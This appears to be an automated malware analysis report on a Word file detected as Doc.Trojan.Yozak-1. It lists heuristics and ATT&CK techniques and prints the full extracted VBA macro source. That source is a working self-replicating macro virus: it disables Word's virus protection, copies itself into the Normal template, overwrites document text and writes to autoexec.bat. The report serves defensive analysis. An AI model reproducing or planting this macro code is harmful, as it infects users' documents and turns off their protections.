MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic and VBA macros, including an autoopen macro, which are indicative of malicious intent. The script attempts to display multiple message boxes with cryptic text and mentions 'yozak', potentially related to the ClamAV detection name 'Doc.Trojan.Yozak-1'. It also attempts to write to 'c:\autoexec.bat', suggesting an attempt to establish persistence or drop additional payloads.
Heuristics 4
-
ClamAV: Doc.Trojan.Yozak-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Yozak-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2395 bytes |
SHA-256: 24e33428ca387a22445924937594a1cd3877ee4519408ed30b91831577efe55d |
|||
|
Detection
ClamAV:
Doc.Trojan.Yozak-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Sub Alpha()
Sub autoopen()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.DisplayRecentFiles = False
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
CommandBars("Tools").Visible = False
If NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 1) = "'Sub Alpha()" Then
nti = 101
Else
nti = 100
End If
If ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 1) = "'Sub Alpha()" Then
adi = 101
Else
adi = 100
End If
If adi = 100 And nti = 101 Then
a = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 50)
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 1000
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromstring a
ElseIf adi = 101 And nti = 100 Then
a = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 50)
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 1000
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromstring a
End If
If Day(Now) = (12 * Rnd + 3 + 6) Then
MsgBox "[qwertyuiopasdfghjklzxcvbnm]" & vbCr & "New Order of coderz and cyber criminals", vbApplicationModal, "Alphabet"
Beep
MsgBox "[mnbvcxzlkjhgfdsapoiuytrewq]" & vbCr & "I don't need this fucking world", vbCritical, "Alpha Project From [dr]yozak"
Beep
Open "c:\autoexec.bat" For Random As hhlpfile
Print hhlpfile; "echo Clan Of Cyber Criminals waz here"
Print hhlpfile; "echo visit our web site members.xoom.com/CCCriminals"
Print hhlpfile; "echo [mnbvcxzpoiuytrewqalskdjfhg]"
Close hhlpfile
Selection.SetRange 1, 1000
Selection.Text = "qwertyuiopmnbvcxzasdflkjhg1234567890-=\][;/.,`~!@#$%^&*()_+|}{:'<>?"
End If
End Sub
Sub viewvbcode()
On Error Resume Next
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 50
NormalTemplate.Saved = False
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 50
Application.ShowVisualBasicEditor = True
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.